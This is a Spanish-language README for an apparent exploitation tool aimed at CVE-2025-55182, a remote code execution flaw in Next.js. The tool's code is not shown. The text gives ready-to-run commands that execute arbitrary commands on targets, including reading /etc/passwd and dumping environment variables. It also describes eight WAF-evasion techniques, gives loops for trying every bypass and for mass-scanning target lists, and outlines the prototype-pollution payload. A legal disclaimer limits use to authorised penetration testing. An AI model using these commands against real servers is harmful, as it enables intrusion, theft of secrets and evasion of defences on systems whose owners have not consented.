
Escáner automatizado para CVE-2025-55182 RCE en Next.js con 8 técnicas de evasión de WAF, ejecución de comandos personalizada y modo de detección solo para pruebas en pruebas de penetración autorizadas.
CVE-2025-55182 Escáner Avanzado
Herramienta avanzada de pruebas de penetración para detectar y explotar la vulnerabilidad CVE-2025-55182 en aplicaciones Next.js
📋 Tabla de Contenidos
🔍 Visión General CVE-2025-55182 es una vulnerabilidad crítica de ejecución remota de código (RCE) que afecta a aplicaciones Next.js a través de React Server Components. Este escáner proporciona una forma automatizada de detectar y explotar esta vulnerabilidad con diversas técnicas de bypass de WAF.
Puntuación CVSS: 9.8 (Crítica)
✨ Características
🚀 Instalación Requisitos previos
# Instalar dependencias
pip install -r requirements.txt
# Hacer el script ejecutable (Linux/Mac)
chmod +x scanner.py
Instalación con Docker
# Construir imagen Docker
docker build -t cve-2025-55182-scanner .
# Ejecutar con Docker
docker run --rm cve-2025-55182-scanner -h
📖 Uso Uso básico
# Mostrar ayuda
python scanner.py -h
# Probar un objetivo
python scanner.py -d http://target.com --test-only
# Ejecutar comando
python scanner.py -d http://target.com -c "whoami"
Opciones de línea de comandos
📚 Ejemplos Explotación Básica
# Probar si el objetivo es vulnerable
python scanner.py -d http://vulnapp.com --test-only
# Ejecutar comando simple
python scanner.py -d http://vulnapp.com -c "id"
# Listar contenido del directorio
python scanner.py -d https://target.com -c "ls -la" -k
# Leer archivo del sistema
python scanner.py -d http://localhost:3000 -c "cat /etc/passwd"
Ejemplos de Bypass de WAF
# Usar bypass de codificación Base64
python scanner.py -d http://target.com -c "uname -a" -t 2
# Usar codificación Unicode
python scanner.py -d https://target.com -c "whoami" -t 3 -k
# Usar técnicas mixtas con proxy
python scanner.py -d http://target.com -c "pwd" -t 4 -p http://127.0.0.1:8080
# Probar todas las técnicas automáticamente
for i in {1..8}; do
echo "Probando técnica $i"
python scanner.py -d http://target.com -c "hostname" -t $i
echo ""
done
Uso Avanzado
# Probar múltiples objetivos desde un archivo
for target in $(cat targets.txt); do
echo "Probando $target"
python scanner.py -d $target --test-only
done
# Guardar salida en un archivo
python scanner.py -d http://target.com -c "ifconfig" > output.txt
# Usar con proxy de Burp Suite
python scanner.py -d https://target.com -c "env" -p http://127.0.0.1:8080 -k
🛡️ Técnicas de Bypass El escáner incluye 8 técnicas diferentes de bypass de WAF:
Cada técnica se puede seleccionar con la bandera -t.
🔧 Detalles Técnicos Antecedentes de la Vulnerabilidad CVE-2025-55182 es una vulnerabilidad de contaminación de prototipos en Next.js que conduce a la ejecución remota de código a través de React Server Components. La vulnerabilidad permite a los atacantes ejecutar comandos arbitrarios en el servidor.
Estructura del Payload La herramienta utiliza una solicitud multipart/form-data especialmente diseñada con contaminación de prototipos para lograr RCE:
Promisechild_process de Node.jsMétodo de Detección El escáner envía solicitudes especialmente diseñadas y busca:
X-Action-Redirect que contengan la salida del comando⚠️ Aviso Legal IMPORTANTE: SOLO USO LEGAL Y ÉTICO
Esta herramienta se proporciona para:
NO USE ESTA HERRAMIENTA PARA:
Al usar esta herramienta, usted acepta:
🤝 Contribuciones ¡Las contribuciones son bienvenidas! Así es como puede ayudar:
Reportar Problemas
Contribuciones de Código
Solicitudes de Funcionalidades Sugiera nuevas funcionalidades a través de issues de GitHub con la etiqueta "enhancement".
📄 Licencia Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.
Licencia MIT
Derechos de autor (c) 2025
Por la presente se concede permiso, libre de cargos, a cualquier persona que obtenga una copia de este software y los archivos de documentación asociados (el "Software"), para utilizar el Software sin restricción, incluyendo sin limitación los derechos de usar, copiar, modificar, fusionar, publicar, distribuir, sublicenciar y/o vender copias del Software, y para permitir a las personas a quienes se les proporcione el Software hacer lo mismo, sujeto a las siguientes condiciones:
El aviso de derechos de autor anterior y este aviso de permiso se incluirán en todas las copias o partes sustanciales del Software.
EL SOFTWARE SE PROPORCIONA "TAL CUAL", SIN GARANTÍA DE NINGÚN TIPO, EXPRESA O IMPLÍCITA, INCLUYENDO PERO NO LIMITADO A GARANTÍAS DE COMERCIABILIDAD, IDONEIDAD PARA UN PROPÓSITO PARTICULAR Y NO INFRACCIÓN. EN NINGÚN CASO LOS AUTORES O TITULARES DE DERECHOS DE AUTOR SERÁN RESPONSABLES DE NINGUNA RECLAMACIÓN, DAÑO U OTRA RESPONSABILIDAD, YA SEA EN UNA ACCIÓN DE CONTRATO, AGRAVIO O CUALQUIER OTRO MOTIVO, QUE SURJA DE O EN CONEXIÓN CON EL SOFTWARE O EL USO U OTRO TIPO DE ACCIONES EN EL SOFTWARE.
🔗 Referencias
⭐ Historial de Estrellas Si encuentra útil esta herramienta, ¡considere darle una estrella en GitHub!
Recuerda: Un gran poder conlleva una gran responsabilidad. Usa esta herramienta de forma ética y legal.
| Opción | Descripción | Por defecto |
|---|
| -d, --domain | URL objetivo | http://localhost:3000 |
| -c, --command | Comando a ejecutar | id |
| -t, --technique | Técnica de bypass (1-8) | 1 |
| -p, --proxy | Servidor proxy | Ninguno |
| -k, --insecure | Omitir verificación SSL | False |
| --test-only | Solo probar vulnerabilidad | False |
| -h, --help | Mostrar mensaje de ayuda | N/A |